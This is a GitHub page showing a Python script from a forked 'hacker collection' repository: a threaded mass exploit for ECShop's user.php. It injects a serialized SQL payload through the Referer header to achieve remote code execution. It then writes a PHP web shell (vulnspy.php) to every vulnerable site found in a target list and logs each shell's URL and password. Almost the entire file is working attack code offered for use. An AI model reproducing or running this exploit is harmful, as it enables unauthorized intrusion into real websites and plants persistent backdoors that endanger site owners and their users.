forked from themycode/python-hacker-collection
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy patheschop-exp.py
More file actions
59 lines (52 loc) · 2.38 KB
/
eschop-exp.py
File metadata and controls
59 lines (52 loc) · 2.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
import requests
import threading
import os
import re
import time
xj=open('save.txt','w')
xj.close()
cz=[]
def exploit(url):
url=url+'/user.php'
header={'Referer': '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'}
data={'action':'login','vulnspy':'phpinfo();exit;'}
try:
reqt=requests.post(url=url,headers=header,data=data,timeout=10)
if 'PHP Version' in reqt.text:
print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url))
print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url),file=open('save.txt','a'))
cz.append(reqt.url)
else:
print('[-] Not debug url:{}'.format(reqt.url))
except Exception as g:
print('[-] Error {}'.format(g))
if len(cz)>0:
print('[+] start getshell')
else:
print('[-] not debug,Unable to getshell')
exit()
getshellpayloads={'action':'login','vulnspy':'eval(base64_decode($_POST[d]));exit;','d':'ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8+Jyk7'}
for t in cz:
tx=re.sub('/user.php','',str(t))
try:
reqts2=requests.post(url=t,headers=header,data=getshellpayloads)
reqts3=requests.post(url=tx+'/vulnspy.php?vulnspy=phpinfo();')
if 'PHP Version' in reqts3.text:
print('[+] Getshell success url:{} password:{}'.format(reqts3.url, 'vulnspy'))
print('[+] Getshell success url:{} password:{}'.format(reqts3.url,'vulnspy'),file=open('save.txt','a'))
else:
print('[-] Getshell failure url:{}'.format(reqts3.url))
except Exception as p:
print('[-] Error {}'.format(p))
if __name__ == '__main__':
user = input('file:')
if os.path.exists(user):
print('[+] file {} ok'.format(user))
else:
print('[-] not file {}'.format(user))
exit()
dk=open('{}'.format(user),'r')
for d in dk.readlines():
qc="".join(d.split('\n'))
t=threading.Thread(target=exploit,args=(qc.rstrip('/'),))
t.start()